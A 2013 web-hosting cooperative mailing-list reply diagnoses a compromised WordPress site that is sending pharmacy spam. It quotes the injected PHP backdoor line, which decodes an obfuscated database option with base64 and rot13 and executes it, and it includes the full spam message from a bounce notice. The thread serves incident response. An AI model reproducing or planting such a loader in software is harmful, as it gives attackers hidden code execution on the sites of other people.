[HCoop-Help] wordpress spam, failed mail delivery notices.

Clinton Ebadi clinton at unknownlamer.org
Fri May 17 22:39:10 EDT 2013 

Yagnesh Raghava Yakkala <yagnesh at hcoop.net> writes:

> Hello all,
>
> My inbox is getting filled with mail delivery failure notices today (similar
> to the attached mail). It looks like it has something to do with akismet spam
> filter on my wordpress site (sapporoindians.com). I don't understand the
> problem.
>
> Any insights would great on:
> - how to know which program is initiating mail delivery
> - how to stop receiving failure notices to my inbox
>
> FYI, I haven't touched anything on my site for a long while now.

Ack, Jesse is right -- your site has most definitely been hacked!

This code is in a few files:

$z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d"); $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){ $_z=create_function("",$z); @$_z(); }

First, your wp-content directory is allowing ANYONE in the entire world
to write to it via afs... did you accidentally grant system:anyuser
write permissions when trying to do something else (I know the plugin
installer does not work unless your daemon user can writer to
wp-content)?

Then there is the telltale chmod 777 (that does nothing, since we are
using afs).

The file modification dates indicate that your site was likely
compromised on the first of May.

To mitigate the immediate problem (loading your site sends spam!) I
moved the site out of the way; from what I can tell you will need to
restore the database from a backup and re-install wordpress entirely:

        http://codex.wordpress.org/FAQ_My_site_was_hacked

Including changing your database password, wordpress passwords, etc. If
you do not have a database backup, you'll want to check your database
for any odd looking tables or values. I think the only damage done to
your db was inserting a few rows in the options table. If possible, you
may want to dump only posts/comment data and re-import that.

If you file a bugzilla bug, I will offer what assistance I can with
fixing your site. Luckily, it appears that the attackers did not manage
to further compromise the system or your account. Whatever you do, do
not delete the compromised files (yet).

I am going to spend some time analyzing what their code does... it is
stored as an obfuscated item in the options table. My plan is to dump
the options table and decode the function source to figure out what
exactly they were trying to do. Luckily, the outgoing mail log seems to
indicate that they were not very successful in sending much spam, but
you never know what script kiddies might be up to.

> Thanks.
>
> From: Mail Delivery System <Mailer-Daemon at deleuze.hcoop.net>
> Subject: Mail delivery failed: returning message to sender
> To: yagnesh at hcoop.net
> Date: Fri, 17 May 2013 14:40:50 -0400
>
> This message was created automatically by mail delivery software.
>
> A message that you sent could not be delivered to one or more of its
> recipients. This is a permanent error. The following address(es) failed:
>
>   peb756 at aol.com
>     SMTP error from remote mail server after RCPT TO:<peb756 at aol.com>:
>     host mailin-03.mx.aol.com [205.188.156.193]: 550 5.1.1 <peb756 at aol.com>:
>     Recipient address rejected: aol.com
>
> ------ This is a copy of the message, including all the headers. ------
>
> Return-path: <yagnesh at hcoop.net>
> Received: from navajos.hcoop.net ([69.90.123.70] ident=yagnesh)
> 	by deleuze.hcoop.net with smtp (Exim 4.63)
> 	(envelope-from <yagnesh at hcoop.net>)
> 	id 1UdPa8-0007IJ-Ot
> 	for peb756 at aol.com; Fri, 17 May 2013 14:40:45 -0400
> Received: by navajos.hcoop.net (sSMTP sendmail emulation); Fri, 17 May 2013 14:40:44 -0400
> From: "yagnesh" <yagnesh at hcoop.net>
> X-Originating-IP: 89.28.14.35
> Date: Fri, 17 May 2013 14:40:44 -0400
> To: peb756 at aol.com
> Subject: Celebrate the May with 10% off for All Brands and Generics in our Store
> X-PHP-Originating-Script: 10924:akismet.php(32) : runtime-created function(9) : eval()'d code(1) : eval()'d code
> Message-Id: <1307461067.1496 at sapporoindians.com>
> MIME-Version: 1.0
> Content-Type: text/html
> Content-Transfer-Encoding: 8bit
>
>
>  
> Dear Peter,<br />
> <br />
> Celebrate the May with 10% off for all Brands and Generics in our Store - use <b>Your 10% discount code: 7728315</b> at checkout for big savings.<br />
> <a href='http://fenstercamp.com/counter.php?936fb43bcac53278bf834a76f'>By reordering with us</a> you always getting best price for genuine quality and great customer service.<br />
> All goods are delivered in 7-10 business days or sooner, with live package tracking. Nothing gets lost or we will reship at no additional cost to you.<br />
> <br />
> Best regards,<br />
> RxDiler<br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> <br />
> DISCLAIMER:<br />
> hundred serfs; but one of these estates had already been sold, and the<br />
> attention of a relative. The count, pipe in hand, was pacing up and down<br />
> was always conscious of his own guilt toward him for having wasted the<br />
> dying of wounds and the sovereign had thanked him for heroic deeds, and<br />
> "He has gone to Peters... But I don\'t know," said Pierre.<br />
> "Well, if it\'s too long we\'ll take it up... we\'ll tack it up in one<br />
> spirited impression.<br />
> to a man\'s face, to say what the other, whoever he might be, did not<br />
> on her face and showing no concern for her mistress.<br />
> Russian side merely because in Petersburg--far from the seat of war--a<br />
> sat down again in her former position. Twice she turned and looked at<br />
> manner. If he ever thought of Helene, it was just of her beauty and her<br />
> remembers me," said Prince Andrew with a low and courteous bow quite<br />
> to confide her sorrow, and much sorrow fell to her lot just then. The<br />
> therefore fought against Napoleon. In 1807 he suddenly made friends<br />
> as real as any other recollection. She not only remembered what she had<br />
> alert than he had done the day before. Only his eyes gleamed feverishly<br />
> at Papa!" though as it was they never took their eyes off the couple.<br />
> best of officers could do in his position, he was in a state akin to<br />
> Marya Dmitrievna on her right and Anna Mikhaylovna on her left, the<br />
> "What has happened?" asked Pierre, entering Marya Dmitrievna\'s room.<br />
> moved by fear or vanity, rejoiced or were indignant, reasoned, imagining<br />
> that somebody actually submitted such a proposal to him. But a commander<br />
> coming battle and the victory that would certainly result from it--no<br />
> distinguished his form and her shortsighted eyes tried to make out his<br />
> newly erected buildings were standing empty and that the serfs continued<br />
> who did the actual fighting.<br />
> and takes bribes. What nonsense! Besides, why shouldn\'t he take bribes?<br />
> a power, and therefore before speaking about Napoleons, Louis-es, and<br />
> to frown.<br />
> was dead--and Tikhon reminded him that she was no more, and he shouted,<br />
>
>
> ----------

-- 
unknownlamer: Hail Satan
unknownlamer: And do drugs
urbanbohemiac: are you wearing underwear
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 229 bytes
Desc: not available
Url : http://lists.hcoop.net/pipermail/hcoop-help/attachments/20130517/7bd8b798/attachment-0001.pgp

More information about the HCoop-Help mailing list